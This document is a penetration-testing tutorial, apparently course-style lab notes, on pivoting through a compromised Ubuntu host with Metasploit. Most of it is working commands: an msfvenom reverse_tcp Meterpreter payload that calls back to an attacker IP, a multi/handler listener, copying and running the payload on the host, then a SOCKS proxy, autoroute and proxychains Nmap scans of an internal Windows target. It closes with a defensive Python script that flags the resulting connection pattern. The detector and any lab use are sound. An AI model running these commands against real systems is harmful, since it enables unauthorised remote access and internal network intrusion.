Meterpreter tunneling

  • we have our Meterpreter shell access on the Ubuntu server (the pivot host)
  • we want to perform enumeration scans through the pivot host, but we would like to take advantage of the conveniences that Meterpreter sessions provide

tmux env setup

tmux setenv LOCAL_IP <attacker_ip>
tmux setenv WIN_IP_NET_2 <windows_target_ip>
tmux setenv EXTERNAL_IP_OF_PIVOT_HOST <pivot_external_ip>

Note: tmux setenv updates the tmux session environment, which is inherited by windows and panes opened afterwards; a shell that is already running will not see the variables unless you also export them there (for example export LOCAL_IP=<attacker_ip>).

Step 1

Creating Payload for Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LOCAL_IP -f elf -o shell.elf LPORT=4444

Configuring & Starting the multi/handler

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LOCAL_IP; set lport 4444; exploit"

Copy the shell.elf binary file to the Ubuntu pivot host over SSH

scp shell.elf ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST:~/

Execute shell.elf on the pivot host to gain a Meterpreter session

chmod +x shell.elf
./shell.elf

Step 2 - ping sweep

We know that the Windows target is on the network. Assuming that the firewall on the Windows target allows ICMP requests, we want to perform a ping sweep of this network. We can do that with Meterpreter's ping_sweep module, which generates the ICMP traffic from the Ubuntu host towards the target network.

Step 3 - proxy

Configuring MSF's SOCKS Proxy

use auxiliary/server/socks_proxy
set SRVPORT 9050
set version 4a

Confirming Proxy Server is Running

Adding a Line to proxychains.conf if Needed

After initiating the SOCKS server, we configure proxychains to route traffic generated by other tools like Nmap through our pivot on the compromised Ubuntu host. Add the line below at the end of /etc/proxychains.conf if it isn't already there (a proxychains entry is type, host and port, so the listener's address is required).

socks4 127.0.0.1 9050

Step 4 - AutoRoute

Creating Routes with AutoRoute

Finally, we need to tell our socks_proxy module to route all the traffic via our Meterpreter session. We can use the post/multi/manage/autoroute module from Metasploit to add routes for the subnet and then route all our proxychains traffic.

use post/multi/manage/autoroute

It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.

run autoroute -s <target_subnet_cidr>

Listing Active Routes with AutoRoute

sessions -i 1
meterpreter > run autoroute -p

Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------
                                         Session 1
                                         Session 1
                                         Session 1

As you can see from the output above, the routes for the network have been added via session 1. We will now be able to use proxychains to route our Nmap traffic via our Meterpreter session.

Step 5

Testing Proxy & Routing Functionality

proxychains nmap $WIN_IP_NET_2 -p3389 -sT -v -Pn

proxychains can only relay complete TCP connections, so the scan has to be a TCP connect scan (-sT) with Nmap's host discovery disabled (-Pn); raw-packet scan types and ICMP probes cannot pass through the SOCKS proxy.
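From the defender's side, the steps above leave a recognisable footprint in connection logs: the pivot host holds one long-lived outbound TCP connection to the handler port (4444 here) while fanning out short TCP connections to many internal hosts on a single port (the proxied Nmap scan). The Python below is an added example, not part of the original notes; its log records, addresses and thresholds are constructed assumptions.

```python
"""Spot the pivot pattern: long outbound session + internal fan-out from one host."""
import ipaddress
from collections import defaultdict

# Constructed sample records: (epoch_ts, src_ip, dst_ip, dst_port, duration_s)
SAMPLE_CONNS = [
    (1000, "10.0.20.5", "203.0.113.5", 4444, 1800.0),   # long-lived reverse_tcp session
    (1000, "10.0.20.5", "203.0.113.7", 443, 2.1),       # ordinary short web request
] + [
    (1200 + i, "10.0.20.5", f"172.16.20.{i}", 3389, 0.01) for i in range(1, 25)
] + [
    (1300, "10.0.20.9", "172.16.20.19", 445, 30.0),     # benign file-share use
]

PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def long_outbound(conns, min_duration=600.0):
    """Internal hosts with a long-lived connection to an external address (C2 candidate)."""
    return {src: (dst, port) for _, src, dst, port, dur in conns
            if is_internal(src) and not is_internal(dst) and dur >= min_duration}


def fan_out(conns, window=120, min_targets=10):
    """Internal hosts that reach >= min_targets distinct internal hosts on one port within window seconds."""
    by_key = defaultdict(list)
    for ts, src, dst, port, _ in conns:
        if is_internal(src) and is_internal(dst):
            by_key[(src, port)].append((ts, dst))
    hits = {}
    for (src, port), events in by_key.items():
        events.sort()
        for i, (t0, _) in enumerate(events):      # sliding window over sorted timestamps
            targets = {dst for ts, dst in events[i:] if ts - t0 <= window}
            if len(targets) >= min_targets:
                hits[src] = (port, len(targets))
                break
    return hits


def find_pivots(conns):
    """Hosts that both hold a long outbound session and scan internally: likely pivots."""
    beacons, scans = long_outbound(conns), fan_out(conns)
    return {src: {"c2": beacons[src], "scan": scans[src]} for src in beacons if src in scans}


if __name__ == "__main__":
    print(find_pivots(SAMPLE_CONNS))
```

Either signal alone produces false positives (VPN clients, vulnerability scanners), so the correlation on one source host is what makes the alert worth triaging.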